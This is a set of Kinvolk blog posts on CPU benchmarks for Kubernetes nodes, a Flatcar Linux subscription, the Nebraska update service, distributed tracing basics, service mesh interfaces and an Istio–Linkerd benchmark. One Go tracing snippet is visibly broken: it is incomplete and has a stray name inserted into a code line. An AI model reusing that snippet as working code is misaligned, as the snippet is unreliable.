Foreground client: memtier_benchmark -P memcache_binary -t $THREADS --test-time 30 --ratio 1:1 -c 25 -x 1 --data-size-range=10240-1048576 --key-pattern S:S

The extra arguments specify that the ratio of get to set operations is 1:1, 25 connections are used, one iteration (because we rerun the process for multiple iterations), an object size ranging from 10 KiB to 1 MiB, and a sequential key pattern for both get and set operations.

With memcached, Ampere’s eMAG benefits from its significantly higher multi-thread memory bandwidth, leading the field by a large margin. AMD’s EPYC offers a better price/performance ratio than Intel’s XEON.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

Redis memtier

Redis is an in-memory key-value store, but compared to memcached above, it is single-threaded by nature. To test multiple cores/CPUs we launched multiple redis database instances and memtier client instances, and benchmarked in parallel and summed the results up.

The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the process count is varied from half the number of CPU threads, to half the number of cores to a single process:

Background database processes: redis --port $PROCESS_PORT
Foreground client processes: memtier_benchmark -p $PROCESS_PORT -P redis -t 1 --test-time 30 --ratio 1:1 -c 25 -x 1 --data-size-range=10240-1048576 --key-pattern S:S

The results for all processes are summed up in an additional step. The extra arguments specify that the ratio of get to set operations is 1:1, 25 connections are used, one iteration (because we rerun the process for multiple iterations), an object size ranging from 10 KiB to 1 MiB, and a sequential key pattern for both get and set operations.

All three contenders perform about the same when compared at the physical cores level. With hyperthreading enabled – and the respective security implications accepted – Intel’s XEON clearly moves ahead of the field. AMD’s EPYC has a small gain from hyperthreading, too, leaving eMAG at the third position. AMD also excels at cost/performance running redis, with eMAG in the second position.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $


We use Apache’s ab to benchmark NGINX’ HTTP throughput in requests per second. As with all other network tests (iperf and the following latency tests), the client is an Intel XEON node in all cases and the TCP connections in Kubernetes are pod-to-pod over the Calico’s IP-in-IP overlay network. We used 56 connections because the fixed XEON client has 56 CPU threads.

The benchmark has a run length of 30 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: nginx
Fixed XEON worker node with client pod: ab -c 56 -t 30 -n 999999999 http://$POD_IP:8000/ (The high number of request just ensures that only the timeout of 30 seconds will terminate the benchmark and not the number of sent requests which is just 50000 by default.)

AMD’s EPYC and Intel’s XEON benefit from their significantly better networking performance (see the iperf benchmark above), leaving eMAG at the third position when raw performance is the main concern. Hyperthreading on both XEON and EPYC does not have a noticeable impact on performance, though it adds more jitter in performance when activated. Ampere’s eMAG benefits from its competitive pricing when cost is a concern, moving up to the second position.

Raw Performance – Hyperthreading ON
(you may need to scroll → to see the other column)
Performance per $
Raw Performance – Hyperthreading OFF
(you may need to scroll → to see the other column)
Performance per $ – Hyperthreading OFF

NGINX wrk2

Wrk2 is somewhat of a Kinvolk favorite and has been used in previous works of ours. It’s the only benchmark tool we’re aware of that takes Coordinated Omission into account, which is important for realistically measuring latency in overload situations. Wrk2 takes a constant request rate and calculates the latency from the point in time where the request would have been sent instead of sending requests at the actual (possibly lower than requested) rate, and measuring individual requests’ latencies when the requests are actually sent.

As with all other network tests, the client is an Intel XEON node in all cases and the TCP connections in Kubernetes are pod-to-pod over the Calico’s IP-in-IP overlay network. We used 56 connections because the fixed XEON client has 56 CPU threads. The request rate is fixed to 2000 requests per second so that no system is overloaded (cf. the ab results above). The request body has a length of 100 bytes.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: nginx
Fixed XEON worker node with client pod: wrk -d 60s -c 56 -t 56 -R 2000 -L -s /usr/local/share/wrk2/body-100-report.lua http://$POD_IP:8000/

The minimal observed p999 latency was similar across all systems in all datacenter regions. However, there is a lot of jitter and cases with worse p999 latency for the Intel XEON systems.

We made a second run with Hyperthreading disabled (instead of forcing nginx to only use half of the CPU threads and because we cannot control the number of kernel threads of the network stack) and did not observe large jitter but also had less samples.

Not visible in the charts is that the Intel Xeon server is twice as expensive because there is no meaningful way to display the system cost in regards to the resulting latency since adding more parallel systems won’t reduce the p999 latency of a single system.

HTTP P999 Tail Latency With Coordinated Omission (lower is better) – Hyperthreading ON
Hyperthreading OFF

fortio client with a fortio server

We use fortio to measure p999 latency, both for HTTP 1.1 as well as for gRPC (HTTP2). We used 20 connections and fixed the request rate to 2000 req/s.

As with all other network tests, the client is an Intel XEON node in all cases and the TCP connections in Kubernetes are pod-to-pod over the Calico’s IP-in-IP overlay network.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: fortio server -ui-path ''
Fixed XEON worker node with client pod for HTTP/1.1: fortio load -c 20 -qps=2000 -t=60s -payload-size=50 -keepalive=false $POD_IP:8080

For HTTP/1.1 the observed minimal p999 latencies across all systems and datacenter regions was similar. This time there was jitter for the AMD EPYC systems with outliers that distort the whole graph.

Ampere’s eMAG had p999 latency of ~4ms, AMD’s EPYC ~3-4ms not counting the outliers in, and Intel’s XEON ~3-7ms.

We made a second run with Hyperthreading disabled (instead of fixing fortio to half of the CPU threads manually and because we cannot control the number of kernel threads of the network stack) and did not observe large jitter but also had less samples.

HTTP/1.1 P999 Tail Latency (lower is better) – Hyperthreading ON
HTTP/1.1 P999 Tail Latency (lower is better) – Hyperthreading OFF

For gRPC (HTTP/2) we used 20 connections but with 10 HTTP/2 streams per TCP connection. The request rate was fixed to 2000 req/s.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: fortio server -ui-path ''
Fixed XEON worker node with client pod for gRPC: fortio load -grpc -s 10 -c 20 -qps=2000 -t=60s -payload-size=50 -keepalive=false $POD_IP:8079

Both AMD’s Epyc and Intel’s XEON deliver solid latency results for gRPC, about 3 times their HTTP 1.1 latency. Ampere’s eMAG struggles with gRPC and displays massive jitter in its response times.

We made a second run with Hyperthreading disabled again and even though we had less samples in this run the previous findings were confirmed.

gRPC P999 Tail Latency (lower is better) – Hyperthreading ON
gRPC P999 Tail Latency (lower is better) – Hyperthreading OFF


First of all, Lokomotive Kubernetes and Flatcar Container Linux worked well on arm64 with Ampere’s eMAG. Even hybrid clusters with both arm64 and x86 nodes were easy to use either with multi-arch container images, or the built-in Kubernetes labels as node selectors.

Overall Ampere’s eMAG offers good price/performance ratio. Surprising benchmark results are those where we see Ampere’s eMAG leading for a certain set of use cases.

It excels at multi-thread performance, particularly with memory I/O heavy and throughput related workloads (e.g. multi-thread key-value stores and file operations on a tmpfs). These are the clear places where it would pay off to switch the server type. In conclusion the eMAG also feels well-positioned for cloud-native workloads, which tend to fully commit memory and compute resources to pods.

AMD’s EPYC has a slight integer/floating point processing advantage with vector arithmetics and is in the same cost range as eMAG, as well as faster IP-in-IP overlay networking, but suffers from lower overall multi-thread throughput.

Intel’s XEON, while leading with raw performance in a number of benchmarks, comes in last when cost is factored in.

Attached is a performance-per-cost summary graph for the above benchmarks, normalized to the eMAG results, to the EPYC results, and to the XEON results for easy comparison.

Compiler and application optimizations for arm64 will likely change the results in the future in particular for those cases where a huge difference was observed (the iperf IP-in-IP scenario is certainly a focus area where we can expect them soon, others are memcpy/memmov and atomics). It will also be interesting to repeat such a benchmark again on the next generations of the three manufacturers given the fact that the eMAG is the first offering of Ampere Computing. The benchmark code is here for reproducibility:

Future Work

We are currently in the process of productizing and polishing Arm support in both Flatcar Container Linux and Lokomotive Kubernetes, and will announce general availability in the near future.

Benchmark tools and benchmark automation are publicly available, and may see support for other CPU architectures in the future.


Normalized performance/cost summary graph for eMAG:

Normalized performance/cost summary graph for EPYC:

Normalized performance/cost summary graph for XEON:

Announcing the Kinvolk Flatcar Container Linux Subscription

Back in March last year, following Red Hat’s acquisition of CoreOS, Inc., we announced Flatcar Container Linux, a fork of CoreOS Container Linux. At the time, we saw this as a kind of insurance policy for a future when Red Hat might terminate ongoing support and maintenance of the widely-deployed CoreOS platform. As we put it at the time:

The strongest open source projects have multiple commercial vendors that collaborate together in a mutually beneficial relationship. This increases the bus factor for a project. Container Linux has a bus factor of 1. The introduction of Flatcar Linux brings that to 2.

Today we announced the general availability of the Kinvolk Flatcar Container Linux Subscription. The subscription includes:

  • technical support including optional 24x7x365 response time service level agreement
  • access to the Kinvolk customer portal for ticket management and knowledge base articles
  • new software releases across four delivery channels: stable, beta, alpha and edge (experimental)
  • regular security updates
  • the new Kinvolk Update Service, available hosted or on-prem, for fine-grain control and visibility of Flatcar updates across an entire fleet of machines (for more about the Kinvolk Update Service and the technology behind it, check out this post by project lead Joaquim Rocha.

We are particularly pleased at the broad welcome this announcement has received from both end users and our industry partners:

“As we realized CoreOS Container Linux was reaching end of support, we reached out to the team at Kinvolk and were impressed by their commitment to the original CoreOS vision, and their ability to support us through a seamless transition to Flatcar. With a Flatcar Container Linux subscription in place, we now feel comfortable that we have a viable long-term platform strategy.”
– Michael Ferraro, VP Platform at UpGuard

“We believe Flatcar Container Linux will be welcomed by developers and administrators who rely on CoreOS today for its lightweight approach, built-in support of the Docker container engine, and as a proven platform for Docker Enterprise.”
– Justin Graham, VP Product Management at Docker, Inc.

“We’re longtime fans of CoreOS Container Linux, and it remains the most popular substrate for container environments in our bare metal cloud. With Flatcar Container Linux, the community now has a strong roadmap upon which to continue the momentum of CoreOS, backed by a proactive support model and the stellar Kinvolk team. We are inviting our CoreOS users to migrate to Flatcar Container Linux, which has been fully integrated into the Packet platform.”
– Zac Smith, CEO at Packet, a leading bare metal cloud provider based in New York

“At Container Solutions, we’re in the business of helping customers shift their businesses to modern software development and deployment practices. CoreOS Container Linux has been one of our customers’ most popular options, so we are pleased to see Kinvolk taking the initiative to enable them to continue with the same software foundation on a commercially supported basis.”
– Jamie Dobson, CEO at Container Solutions

“CoreOS Container Linux has seen wide adoption across the industry, and many users are looking for a path forward that doesn’t entail significant operational disruption. Over the past 18 months, Kinvolk has demonstrated their commitment and ability to do this with Flatcar Container Linux, and I’m pleased to see they are now backing that up with commercial support and managed update service.”
– Joe Sandoval, SRE Manager, Infrastructure Platform at Adobe, and OpenStack User Committee member

“We are excited to be collaborating with Kinvolk to enable an upgrade path for our customers who are currently deploying Kubernetes with CoreOS, as well as supporting future Kubernetes adopters who need a secure operating system foundation.”
– Matt Barker, CEO at Jetstack, a leading Kubernetes consultancy based in London, UK

“At Giant Swarm, we strongly believe in the minimal and immutable container Linux approach, which is why we built our managed Kubernetes service on CoreOS (in part with the help of Kinvolk’s engineering team). Going forward, Flatcar Container Linux offers us an identical operational experience, with the commitment to long-term maintenance, support and security updates that we need to ensure a stable platform for our demanding enterprise customers such as Adidas and Vodafone.”
– Timo Derstappen, chief technology officer, Giant Swarm

“The market is looking for a container Linux distribution maintained by an independent, community-oriented team, and Kinvolk has the right pedigree to deliver it. We are excited to collaborate with them to help our Kubermatic Kubernetes Platform customers adopt Flatcar Container Linux.”
– Sebastian Scheele, co-founder and CEO, Loodse

The Kinvolk Flatcar Container Linux Subscription is available today, and is already being adopted by multiple large enterprise customers across thousands of container hosts. Pricing is per node (physical or virtual, without CPU limits). From now until March 31, 2020, Kinvolk will commit to matching the price of any existing CoreOS Container Linux support contract, and will beat it by at least 10% for the first year’s subscription.

Download the Flatcar Container Linux datasheet for details, or get in touch to find out more.

Announcing the Kinvolk Update Service and Nebraska Project

Today we are announcing the Kinvolk Flatcar Container Linux Subscription, which includes a new managed service, the Kinvolk Update Service. This is covered in more detail in another blog post.

In this post, we’ll dive into the details of Kinvolk Update Service and share more about the heritage, functionality, and implementation. Of course, Kinvolk Update Service is built on 100% Open Source Software, which we are also making available today on github as the Nebraska project.


When having a number of Flatcar Container Linux instances that compose a cluster, it is useful to have a tool to roll out updates, and to monitor the status of the instances and the updates progress. i.e. How many instances are currently downloading version X.Y.Z in our cluster? And how many should be updated to the new beta version?


Flatcar Container Linux is based on CoreOS Container Linux, and there is an official update manager solution for CoreOS in form of a web application, called CoreUpdate. However, it is not Open Source and was only available with a paid CoreOS subscription.

Luckily an Open Source alternative called CoreRoller existed. This project offered most of the functionality we desired for our Flatcar Linux subscription clients, but was inactive for a few years, which in Javascript years (used for its frontend) meant a large number of CVEs in the Node packages’ outdated versions, as well as other deprecated or inactive libraries used.

While CoreRoller provided a good starting point, we wanted to build a more advanced solution for the Kinvolk Update Service. Specifically, we aimed to provide a more modern UI and other ways to visualize the updates and states of the cluster. Besides that, we also need to deploy this new service to clients and update it quickly in case of new security fixes or new features. So we concluded that the easiest way to do all this was to build our own version, but starting from and building on the great work done by the authors of CoreRoller.

This new project is called Nebraska and is, of course, completely Open Source software. It powers the Kinvolk Update Service, which is a branded build of Nebraska, hosted and managed by Kinvolk for our subscription customers. There is no community vs corporate versions strategy here, so as with all Kinvolk software, customers can feel safe knowing there is no vendor lock-in strategy behind our offering of Kinvolk Update Service with their Flatcar Container Linux Subscriptions.


So what can the Kinvolk Update Service do for you? What functionality does it have?

Here is a summarized list of capabilities:

  • Control of updates behavior / rate limiting
  • Custom groups and channels
  • Update progress overview
  • Versions evolution timeline
  • Detailed history per machine
  • Authentication through Github
  • Distribution of updates payload or redirection
  • Automatic fetch of new packages’ metadata
  • … (we’ll keep working on more!)

How it’s built

The Kinvolk Update Service, or Nebraska, is composed by a backend that is written in Golang, and a frontend in the form of a web-app, using React and Material UI. A typical overview of how it is deployed is illustrated in the following diagram:

One thing that’s illustrated in the diagram but may not be obvious is that Nebraska is a passive service, in the sense that it is the instances that connect to it giving information about their status, and not Nebraska that connects to instances. So all the data maintained and displayed by Nebraska is about past events (that happened in the last 24 hours by default).


In order to better understand the capabilities of the Kinvolk Update Service in what comes to representing one’s clusters, it’s important to look into its architecture.

The first actor in this architecture is the Application, or App. It represents the entity for which we will monitor and manage the updates. An obvious and common example of an Application in this sense is Flatcar Container Linux, but the Kinvolk Update Service can actually support any other application that shares the protocol it uses for managing the updates. This protocol is called Omaha and was created by Google for managing the updates of apps like Chrome and Google Earth. Thus, any applications/services that use the Omaha protocol can be expected to work with the Update Service.

An Application may have one or more groups. A Group is a very important part of the architecture, since it is where the policy for the actual updates is defined. i.e. what update is to be rolled out, when, to how many instances, at what times, etc. is all defined per Group.

What a Group represents is entirely up to the user though. It may be one flavor of software (e.g. the Edge variant for Flatcar Linux), a geo-location of a cluster (e.g. Central European Cluster), different deployment clusters (e.g. Test Cluster), etc. It is entirely up to the user to choose what Groups represent.

Groups need to know which software and version to provide to their instances, and that’s provided by the next level in our architecture called Channels. However, Channels don’t hold the information about the package directly, but instead point to last level in the architecture: Packages.

A common question at this point is usually: “Why is this level of indirection needed? Why can’t Groups just contain the software+version that compose the actual update, or point themselves to a Package object?”

This can be better answered with an example: if we have several groups that need to point to the stable version of a software, then we just have to have a Channel representing that stable version and point the Groups to the Channel; then, when the stable version is bumped (i.e. the Channel starts pointing to a new Package) all the Groups automatically point to it, instead of having to edit every Group and make them point to the new Package.

Finally here are two similar diagrams, one illustrating what was described above, and the other with an example:

This setup should allow enough flexibility to represent any clusters. But let’s look at example use-cases to have a more practical idea of what this project allows.

Use Cases

Rate Limiting

A company has only 1 cluster of Flatcar Linux machines. It wants the machines to be updated as the new stable version of Flatcar Linux becomes available, but only 10 machines per hour should be updated (so if a number of them fails, it is more noticeable).

What can be done:

  • Run Kinvolk Update Server with the syncer on, to get the stable channel updated automatically;
  • Create a group for the cluster, pointing to the stable channel;
  • Watch the success rate for updates as they happen.

Two Different Purpose Clusters

A team is responsible for 2 clusters: Production + Testing. They want the Testing cluster to have its machines updated to Flatcar Linux Stable version automatically and as soon as it becomes available. The Production cluster on the other hand needs to be running the stable version but updates should be started when QA gives the green light (after using the Testing cluster), and updates should be done safely (1 machine at a time, abort when there’s a failure).

What can be done:

  • Testing’s updates can be triggered automatically, for as many instances at a time and as soon as available to the new stable becomes available (which is automatically done when using the syncer option).
  • Production’s updates can be triggered manually (i.e. its Group will have updates disabled by default), and have the Safe option turned on (1 instance updated at a time, abort on first failure).

Different Geo-locations

A global company has two clusters, one in San Francisco, California, one in Berlin, Germany. Their instances should be updated automatically, but only during the respective office hours.

What can be done:

  • Run Kinvolk Update Server with the syncer on, to get the desired channel updated automatically;
  • Set up a group for each geo-location (they can be called US West Coast, and Central Europe for example);
  • Set up the timezone/office hours for each group and enable updates


There are certainly improvements we can do to the Kinvolk Update Service / Nebraska, and Kinvolk will keep investing in that. Some ideas we aim to implement in the future are:

  • CLI for managing and testing;
  • More ways to visualize the gathered information (new charts, tables, etc.) ;
  • Custom timeline filtering;
  • Performance improvements;
  • UX improvements.

Finally, and as previously mentioned, Nebraska is 100% Open Source and we welcome contributions. If you have a bug fix you want to add, or a feature you want to implement, it is recommendable to first open an issue about it and discuss it in its Github project before writing the code (especially if it is a complex feature).

The Kinvolk team hopes you enjoy its new product. We’d love to hear your thoughts and feedback - via email ([email protected]), or Twitter (@kinvolkio).

A Shallow Dive Into Distributed Tracing

We at Kinvolk were excited to begin working recently with the amazing team over at LightStep on distributed tracing. I must admit that, while I was aware of the OpenTracing project and knew it was probably kind of important, I did not know a whole lot about the topic when we first started chatting about it at KubeCon in Barcelona.

Since then, through our engagement with LightStep, I’ve learned a little bit about the topic and I’d love to share some of those learnings.

Important note: I am a complete novice learning about the topic for the first time. I do not claim to be an expert in this field — hence why I’m calling this a “shallow dive”. I look forward to learning from all the smart people who I hope will point out what I’ve got wrong or oversimplified!


The first thing I learned diving into this space is that there is a broad concept of “observability”, which is traditionally viewed as a combination of three things (which are often conflated or misunderstood):

  • Logs
  • Metrics
  • Tracing.

Logs are pretty well understood - applications have been emitting logs for many years, with varying levels of structure, and tools like fluentd provide means of processing them in large volume.

Metrics - quantified measures of application performance over time - are super useful because they provide easily understandable and immediately actionable data. Projects such as Prometheus have emerged to track metrics at scale.

Tracing is perhaps the most powerful element of observability, and what we are going to dive into with the rest of this blog post.

I should mention there’s an open question about whether you should capture absolutely every data point coming from your system (see: LightStep’s Satellite Architecture), or whether it’s better to sample (e.g. capture one of every 100 metrics). That seems to be an ideological debate that I am not sufficiently expert to weigh in on, but it would appear there are good people on both sides. In any case, the popular tracing libraries all support optional sampling so you can decide what is best for your application.

Distributed Tracing

With the advent of microservices, a single request can lead to dozens or hundreds of separate API calls over network interfaces. While each of the microservices involved may be writing its own logs, making sense of the end-to-end chain that represents the processing related to a single request requires correlating and sequencing event logs (and potentially related metrics) across all the microservices involved.

How it Works

One of the barriers to understanding distributed tracing (like any specialist field) is that it has its own terminology. A good place to start is the fundamental concept of the span.

A span is a named, timed operation representing a chunk of the workflow. Spans can reference other spans in a hierarchical manner (i.e. parent/child). A root span has no parent, and might be (for example) a web request for a particular page. Child spans might be specific pieces of work that are performed to render that page. These references generally represent causal information, i.e. this span was triggered by work performed in this other span. OpenTelemetry goes even further, allowing more complex link relationships between spans (e.g. multiple parents).

A group of spans referencing each other together make up a trace.

This example from the OpenCensus documentation might help to visualize these relationships:

In this example, a request is made to the /messages URL, which first triggers a user authorization step, a cache query and then (because there is a cache miss), a database lookup and populating the cache with the results. The auth, cache.Get, mysql.Query and cache.Put spans are all child spans of the /messages span, and all the spans together comprise a single trace.

In a distributed system, a span typically encompasses more than one microservice. To enable this to work, a span context object is passed along with the regular in-process or RPC function calls, including all the information the tracing system needs to associate events with the current span.

One thing that might be obvious, but which I found quite cool, is that a span can be server or client side, enabling a distributed tracing system to present a coherent view from the front-end code running in a browser to the back-end server fulfilling the client request.

Another thing I really liked is that spans have tags (each a key/value pair), which allow for selector operations just like you would be used to with Kubernetes objects.

Manual vs Automated Instrumentation

So we’ve established that traces comprise spans, which are created in a context which is shared around a distributed system. But how does the tracing system know when a span is created, and how is the context shared across function calls (local in-process, or remote across the network)?

The basic approach is for the programmer to add a few simple API calls to their code. For example, this would start a root span:

   func xyz() {
        sp := opentracing.StartSpan("operation_name")
        defer sp.Finish()

And this would create a child span of an existing span:

 func xyz(parentSpan opentracing.Span, ...) {
        sp := opentracing.StartSpan(
        defer sp.Finish()Chris Kuehl

If the span context needs to be serialized on the wire, this can be done like this:

func makeSomeRequest(ctx context.Context) ... {
        if span := opentracing.SpanFromContext(ctx); span != nil {
            httpClient := &http.Client{}
            httpReq, _ := http.NewRequest("GET", "http://myservice/", nil)

            // Transmit the span's TraceContext as HTTP headers on our
            // outbound request.

            resp, err := httpClient.Do(httpReq)

And so on.

As you can see, adding tracing in this way is straightforward, but it is not automatic.

The “holy grail” of tracing is that is should be possible to add it to any program without requiring any work on the part of the programmer. In practice, how achievable that goal is depends on the language and libraries that are used. The OpenTracing Registry is a good way to see if a specific library already has helpers for instrumentation. Some commercial solutions offer this kind of capability, and OpenTracing has an implementation of automated tracing for Java with its Special Agent.

OpenTracing? OpenCensus? No, OpenTelemetry!

This brings us onto the topic of implementations of distributed tracing.

Modern distributed tracing can trace (pun intended, sorry) its roots back to a Google white paper on its internal system, known as Dapper (co-created by Ben Sigelman, who went on to found LightStep). This introduced terms such as span and trace context for the first time, and inspired the open source project OpenTracing which defined an API that could be implemented by multiple plug-in “tracers”.

OpenTracing was adopted by the Cloud Native Computing Foundation, the home of Kubernetes and many other related projects, and became widely adopted by projects such as Jaeger (also in the CNCF but originally by Uber), and commercial solutions such as DataDog and LightStep.

In a parallel effort, Google evolved its internal distributed tracing and metrics solution with a project known as Census, which it open sourced early in 2018 as OpenCensus. Unlike OpenTracing which defined an API that could have multiple independent implementations, OpenCensus defined both the API and implementation. It also included support for metrics as well as tracing, so had more functionality.

There were clearly pros and cons to each approach - OpenTracing enabled a vibrant ecosystem, whereas OpenCensus had a rich solution, proven in Google, that worked out of the box. OpenTracing and OpenCensus cannot be used together on the same system, leading to potential fragmentation of the tracing community.

Fortunately, the community recognized this issue and the teams got together to agree to focus their efforts on a new project. OpenTelemetry would combine the best aspects of OpenTracing and OpenCensus in one definitive standard, backed by all the major players in the industry.

We at Kinvolk are proud to be part of this important initiative, and grateful to LightStep for sponsoring and supporting our work in this area.

The Road Ahead

The immediate focus for our team working on OpenTelemetry is to help the community create a first release that meets the production needs of users _at least as well _as both OpenTracing and OpenCensus. The community has defined the ambitious goal of achieving this milestone in September 2019, with the OpenTracing and OpenCensus projects being retired by November.

In short, the next few months are crucial for uniting the developer and user communities behind a single vision for the future of distributed tracing and metrics.

Our involvement, working with LightStep and led by our CTO and co-founder Alban Crequy, is to develop various language implementations, starting with Go and Python but eventually expanding to every major language, and contributing to the special interest groups (SIGs) who are still defining the APIs.

We are also starting to look at how we can add auto-instrumentation into OpenTelemetry, to make it as simple to adopt as possible, and enable the ultimate vision of zero touch, complete observability for all cloud native applications.

This is exciting, technically challenging work that significantly advances the state of the art in open source — exactly the kind of project we at Kinvolk like to get involved in!

How PubNative is Saving 30% on Infrastructure Costs with Kinvolk, Packet, and Kubernetes

Earlier this year, mobile advertising technology leader PubNative approached Kinvolk with an interesting challenge: rapid business growth meant their cloud bill was also growing rapidly. Leveraging Packet’s bare metal cloud locations around the globe, they believed they could benefit from significant cost savings and achieve greater flexibility with a multi-cloud architecture.

Running Kubernetes in a bare metal environment was not the same as in AWS, though, and PubNative needed help. Kinvolk brought the technology, expertise and collaborative approach to enable them to successfully migrate their application from Amazon Web Services to Packet, resulting in cost savings of hundreds of thousands of dollars.

Read our case study to find out more about PubNative’s business, the technical challenges, and final results of the project.

How the Service Mesh Interface (SMI) fits into the Kubernetes landscape

How the Service Mesh Interface (SMI) fits into the Kubernetes landscape

Today, the Service Mesh Interface (SMI) was announced at Microsoft’s KubeCon keynote. The SMI aims to provide a consistent interface for multiple service meshes within Kubernetes. Kinvolk is proud to be one of the companies working on the effort. Specifically, we’ve worked to enable Istio integration with the SMI.

A look at Kubernetes Interfaces

Kubernetes has many interfaces, and for good reason. Interfaces allow for multiple underlying implementations of the technology they target. This allows vendors to create competing solutions on a level playing field and helps to guard users from being locked in to a particular solution. The result is increased competition and more rapid innovation; both a benefit to users.

To give context, let’s look at a couple of the important interfaces used in Kubernetes.

Container Network Interface

One of the first interfaces that found its way into Kubernetes was the Container Network Interface (CNI), a technology originally found in the rkt project. Previous to the existence of this interface, you had to use Kubernetes’ limited, built-in networking. With the introduction of the CNI, which standardized the requirements for a networking plug-in around a very simple set of primitives, we witnessed an explosion in the number of networking solutions for Kubernetes, from container-centric open source projects such as flannel and Calico, to SDN infrastructure vendors like Cisco and VMware, to cloud-specific CNIs from AWS and Azure. CNI was also adopted by other orchestrators, such as Mesos and CloudFoundry, making it the de facto unifying standard for container networking.

Container Runtime Interface

The Container Runtime Interface (CRI) was introduced to enable the use of different container runtimes for Kubernetes. Previous to the introduction of the CRI, adding an additional container runtime required code changes throughout the Kubernetes code base. This was the case when rkt was introduced as an additional runtime. But it was obvious that this was not a maintainable solution as more container runtimes were introduced. We now have, with the CRI, many additional container runtimes to choose from: container-d, CRI-O, virtlet, and more.

Container Storage Interface

While relatively new, the Container Storage Interface (CSI) has achieved similar success. It defines a standard approach for exposing block and file storage systems to container orchestrators like Kubernetes. Unlike volume plug-ins, which were “in-tree”, meaning they had to be upstreamed into the main Kubernetes codebase, CSI drivers are external projects, enabling storage developers to develop and ship independently of Kubernetes releases. There are now more than 40 CSI drivers including for Ceph, Portworx, and all the major cloud providers.

And Now: Service Mesh Interface (SMI)

Service Meshes are becoming popular because they provide fine-grained control over microservice connectivity, enabling (for example) smooth transition from an older release of a service to a newer one (e.g. a blue/green or canary deployment model). Linkerd was probably the first such solution, but it has been followed by Istio and many others.

With the growing proliferation of solutions, all deployed and managed in slightly different ways, it was clear that a similar standard interface for enabling service meshes – a Service Mesh Interface (SMI) – would bring value to the Kubernetes community, in much the same way that CRI, CNI and CSI did. Kinvolk was among group of development teams that contributed to this effort, along with the other participating companies. Specifically, we developed the plugin driver that enables Istio to be deployed via SMI.

The Service Mesh Interface promises a common interface for various service meshes. This should make it easier for users to experiment with alternative service mesh solutions, to see which works best for their use cases. As we have found with our own recent testing, due to their differing implementations, each solution has its own unique performance and behavior characteristics. We are hopeful this will lead to greater user choice, and flourishing of new projects in the ecosystem just as happened with other areas where Kubernetes enabled open extensibility.

Performance Benchmark Analysis of Istio and Linkerd

Updated on 2019-05-29 with clarifications on Istio’s mixer configuration for the “tuned” benchmark, and adding a note regarding performance testing with the “stock” configuration we used.

The Istio community has updated the description of the “evaluation configuration” based on the findings of this blog post. While we will not remove the original data from this blog post for transparency reasons, we will focus on data of the “tuned istio” benchmark for comparisons to linkerd.


Over the past few years, the service mesh has rapidly risen to prominence in the Kubernetes ecosystem. While the value of the service mesh may be compelling, one of the fundamental questions any would-be adopter must ask is: what’s the cost?

Cost comes in many forms, not the least of which is the human cost of learning any new technology. In this report we restrict ourselves to something easier to quantify: the resource cost and performance impact of the service mesh at scale. To measure this, we ran our service mesh candidates through a series of intensive benchmarks. We consider Istio, a popular service mesh from Google and IBM, and Linkerd, a Cloud Native Computing Foundation (CNCF) project.

Buoyant, the original creators of Linkerd, approached us to perform this benchmark and tasked us with creating an objective comparison of Istio and Linkerd. As this allowed us to dive more deeply into these service mesh technologies, we kindly accepted the challenge.

It should be noted that Kinvolk currently has ongoing client work on Istio. Our mission is to improve open source technologies in the cloud native space and that is the spirit by which we present this comparison.

We are releasing the automation for performing the below benchmarks to the Open Source community. Please find our tooling at


We had three goals going into this study:

  1. Provide a reproducible benchmark framework that anyone else can download and use.
  2. Identify scenarios and metrics that best reflect the operational cost of running a service mesh.
  3. Evaluate popular service meshes on these metrics by following industry best practices for benchmarking, including controlling for sources of variability, handling coordinated omission, and more.


We aim to understand mesh performance under regular operating conditions of a cluster under load. This means that cluster applications, while being stressed, are still capable of responding within a reasonable time frame. While the system is under (test) load the user experience when accessing web pages served by the cluster should not suffer beyond an acceptable degree. If, on the other hand, latencies would regularly be pushed into the seconds (or minutes) range, then a real-world cluster application would provide a bad user experience, and operators (or auto-scalers) would scale out.

In the tests we ran, the benchmark load - in terms of HTTP requests per second - is set to a level that, while putting both application and service mesh under stress, also allows traffic to still be manageable for the overall system.


rps, User Experience, and Coordinated Omission

HTTP traffic at a constant rate of requests per second (rps) is the test stimulus, and we measure response latency to determine the overall performance of a service mesh. The same rps benchmark is also performed against a cluster without any service mesh (“bare”) to understand the performance baseline of the underlying cluster and its applications.

Our benchmarks take Coordinated Omission into account, further contributing towards a UX centric approach with objective latency measurement. Coordinated Omission occurs when a load generator issues new requests only after previously issued requests have completed, instead of issuing a new request at the point in time where it would need to be issued to fulfill the requests per second rate requested from the load generator.

As an example, if we would want to measure latency with a load of 10 requests per second, we’d need to send out a new request every 100 milliseconds, using a constant request rate of 10 Hz. But when a load generator waits for completion of a request that takes longer than 100ms, the rps rate will not be maintained - only 9 (or fewer) requests will be issued during that second instead of the requested 10. High latency is only attributed to a single request even though objectively, successive requests also experience elevated latency - not because these take long to complete, but because they are issued too late. There are two drawbacks with this behaviour: high latency will only be attributed to a single request, even though succeeding requests suffer elevated latency, too (as called out before - not because the results are late, but the requests are issued too late to begin with). And secondly, the application / service mesh under load is granted a small pause from ongoing load during the delayed response, as no new request is issued when it would need to be to match the requested rps. This is far from the reality of a “user stampede” where load quickly piles up in high latency situations.

For our benchmarks, we use wrk2 to generate load and to measure round-trip latency from the request initiator side. wrk2 is a friendly fork, by Gil Tene, of the popular http benchmark tool wrk, by Will Glozer. wrk2 takes requested throughput as parameter, produces constant throughput load, eliminates Coordinated Omission by measuring latency from the point in time where a request should have been issued, and also makes an effort to “catch up” if it detects that it’s late, by temporarily issuing requests twice as fast as the original RPS rate. wrk2 furthermore contains Gil Tene’s “HDR Histogram” work, where samples are recorded without loss of precision. Longer test execution times contribute to higher precision, thus giving us more precise data particularly for the upper percentiles we are most interested in.

For the purpose of this benchmark, we extended the capabilities of wrk2, adding the handling of multiple server addresses and multiple HTTP resource paths. We do not consider our work a fork and will work with upstream to get our changes merged.


